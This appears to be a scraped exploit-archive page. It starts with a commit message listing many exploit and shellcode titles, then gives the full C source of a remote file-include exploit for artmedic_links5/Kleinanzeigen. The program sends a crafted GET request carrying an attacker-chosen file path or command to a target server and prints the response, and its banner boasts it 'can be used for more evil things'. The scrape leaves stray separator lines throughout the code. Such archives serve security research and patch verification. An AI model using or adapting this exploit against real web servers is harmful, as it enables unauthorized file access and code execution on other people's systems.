880bbe402e
14991 changes to exploits/shellcodes HTC Touch - vCard over IP Denial of Service TeamSpeak 3.0.0-beta25 - Multiple Vulnerabilities PeerBlock 1.1 - Blue Screen of Death WS10 Data Server - SCADA Overflow (PoC) Symantec Endpoint Protection 12.1.4013 - Service Disabling Memcached 1.4.33 - 'Crash' (PoC) Memcached 1.4.33 - 'Add' (PoC) Memcached 1.4.33 - 'sasl' (PoC) Memcached 1.4.33 - 'Crash' (PoC) Memcached 1.4.33 - 'Add' (PoC) Memcached 1.4.33 - 'sasl' (PoC) Alcatel-Lucent (Nokia) GPON I-240W-Q - Buffer Overflow man-db 2.4.1 - 'open_cat_stream()' Local uid=man CDRecord's ReadCD - '$RSH exec()' SUID Shell Creation CDRecord's ReadCD - Local Privilege Escalation Anyburn 4.3 x86 - 'Copy disc to image file' Buffer Overflow (Unicode) (SEH) FreeBSD - Intel SYSRET Privilege Escalation (Metasploit) CCProxy 6.2 - 'ping' Remote Buffer Overflow Savant Web Server 3.1 - Remote Buffer Overflow (2) Litespeed Web Server 4.0.17 with PHP (FreeBSD) - Remote Overflow Alcatel-Lucent (Nokia) GPON I-240W-Q - Buffer Overflow QNAP TS-431 QTS < 4.2.2 - Remote Command Execution (Metasploit) Imperva SecureSphere 13.x - 'PWS' Command Injection (Metasploit) Drupal < 8.5.11 / < 8.6.10 - RESTful Web Services unserialize() Remote Command Execution (Metasploit) Oracle Weblogic Server - Deserialization Remote Command Execution (Patch Bypass) TeamCity < 9.0.2 - Disabled Registration Bypass OpenSSH SCP Client - Write Arbitrary Files Kados R10 GreenBee - Multiple SQL Injection WordPress Core 5.0 - Remote Code Execution phpBB 3.2.3 - Remote Code Execution Linux/x86 - Create File With Permission 7775 + exit() Shellcode (Generator) Linux/x86 - setreuid(0_0) + execve(/bin/ash_NULL_NULL) + XOR Encoded Shellcode (58 bytes) Linux/x86 - setreuid(0_0) + execve(_/bin/csh__ [/bin/csh_ NULL]) + XOR Encoded Shellcode (53 bytes) Linux/x86 - setreuid(0_0) + execve(_/bin/ksh__ [/bin/ksh_ NULL]) + XOR Encoded Shellcode (53 bytes) Linux/x86 - setreuid(0_0) + execve(_/bin/zsh__ [/bin/zsh_ NULL]) + XOR Encoded Shellcode (53 bytes) Linux/x86 - setreuid(0_0) + execve(/bin/ash_NULL_NULL) + XOR Encoded Shellcode (58 bytes) Linux/x86 - setreuid(0_0) + execve(_/bin/csh__ [/bin/csh_ NULL]) + XOR Encoded Shellcode (53 bytes) Linux/x86 - setreuid(0_0) + execve(_/bin/ksh__ [/bin/ksh_ NULL]) + XOR Encoded Shellcode (53 bytes) Linux/x86 - setreuid(0_0) + execve(_/bin/zsh__ [/bin/zsh_ NULL]) + XOR Encoded Shellcode (53 bytes)
131 lines
No EOL
3 KiB
C
131 lines
No EOL
3 KiB
C
/*
|
|
source: https://www.securityfocus.com/bid/10746/info
|
|
|
|
Kleinanzeigen is prone to a file include vulnerability. This issue could allow a remote attacker to include malicious files containing arbitrary code to be executed on a vulnerable computer.
|
|
|
|
If successful, the malicious script supplied by the attacker will be executed in the context of the web server hosting the vulnerable software.
|
|
*/
|
|
|
|
/*
|
|
* artmedic_links5 remote file access exploit
|
|
* Adam Simuntis <n30n@o2.pl>
|
|
*/
|
|
|
|
|
|
#include <stdio.h>
|
|
#include <stdlib.h>
|
|
#include <arpa/inet.h>
|
|
#include <sys/types.h>
|
|
#include <sys/socket.h>
|
|
#include <netdb.h>
|
|
#include <netinet/in.h>
|
|
#include <getopt.h>
|
|
|
|
extern int h_errno;
|
|
|
|
#define PHP_FILE "index.php?id"
|
|
#define BANNER "\nartmedic_links5 remote file access (can be used for more evil things)\nAdam Simuntis <n30n@o2.pl>\n"
|
|
|
|
|
|
int usage(char *p_name){
|
|
printf("\n\n%s { options } "
|
|
"\n\t-s Hostname / IP Address"
|
|
"\n\t-c Path to file"
|
|
"\n\t-p Server port"
|
|
"\n\t-P artmedic links5 path ,ex.:"
|
|
"\n\t\t/artmedic_links5/"
|
|
"\n\t-h This help..\n\n",p_name);
|
|
exit(-1);
|
|
}
|
|
|
|
char *header(char *path, char *php_file, char *cmd, char *host){
|
|
|
|
char buf[8192];
|
|
|
|
sprintf(buf,
|
|
"GET %s%s=%s HTTP/1.1\r\n"
|
|
"Host: %s\r\n"
|
|
"User-Agent: Mozilla/5.0 (X11; U; Linux i666; en-US; rv:1.7.5) "
|
|
"Gecko/20050304 Firefox/1.0\r\n"
|
|
"Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,"
|
|
"text/plain;q=0.8,image/png,*/*;q=0.5\r\n"
|
|
"Accept-Language: en-us,en;q=0.5\r\n"
|
|
"Accept-Encoding: gzip,deflate\r\n"
|
|
"Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7\r\n"
|
|
"Keep-Alive: 300\r\n"
|
|
"Connection: keep-alive\r\n"
|
|
"\r\n\n",path,php_file,cmd,host);
|
|
|
|
return buf;
|
|
|
|
}
|
|
|
|
int main(int argc, char **argv){
|
|
int opt, gniazdko, port;
|
|
struct hostent *hp;
|
|
struct sockaddr_in s;
|
|
char *target, *command, *wej, *header_p, *path, *addr;
|
|
|
|
if(argc<2) usage(argv[0]);
|
|
if(argc>1){
|
|
|
|
while(( opt = getopt(argc,argv,"s:p:P:c:?")) != -1 ){
|
|
|
|
switch(opt){
|
|
|
|
case 's':
|
|
target = optarg;
|
|
break;
|
|
|
|
case 'c':
|
|
command = optarg;
|
|
break;
|
|
|
|
case 'p':
|
|
port = atoi(optarg);
|
|
break;
|
|
|
|
case 'P':
|
|
path = optarg;
|
|
break;
|
|
|
|
case 'h':
|
|
case '?':
|
|
default:
|
|
usage(argv[0]);
|
|
break;
|
|
|
|
}
|
|
}
|
|
|
|
memset(&s,0,sizeof(s));
|
|
|
|
hp = gethostbyname(target);
|
|
addr = inet_ntoa( *(struct in_addr *)hp->h_addr_list[0] );
|
|
|
|
puts(BANNER);
|
|
|
|
s.sin_port = htons(port);
|
|
s.sin_family = AF_INET;
|
|
s.sin_addr.s_addr = inet_addr(addr);
|
|
|
|
if( (gniazdko = socket(PF_INET, SOCK_STREAM, IPPROTO_TCP)) < 0 ) printf("\n{-} Cannot create socket!\n");
|
|
|
|
if (connect(gniazdko, (struct sockaddr*)&s, 16) < 0){
|
|
printf("\nConnection failed!\n");
|
|
exit(-1);
|
|
}
|
|
|
|
header_p = header(path,PHP_FILE,command,target);
|
|
printf("\n{+} Sending request and returning server answer, please wait a while..\n");
|
|
sleep(2);
|
|
send(gniazdko, header_p, strlen(header_p), 0);
|
|
|
|
while(read(gniazdko, &wej, 1))
|
|
putchar(wej);
|
|
|
|
close(gniazdko);
|
|
|
|
return 0;
|
|
}
|
|
} |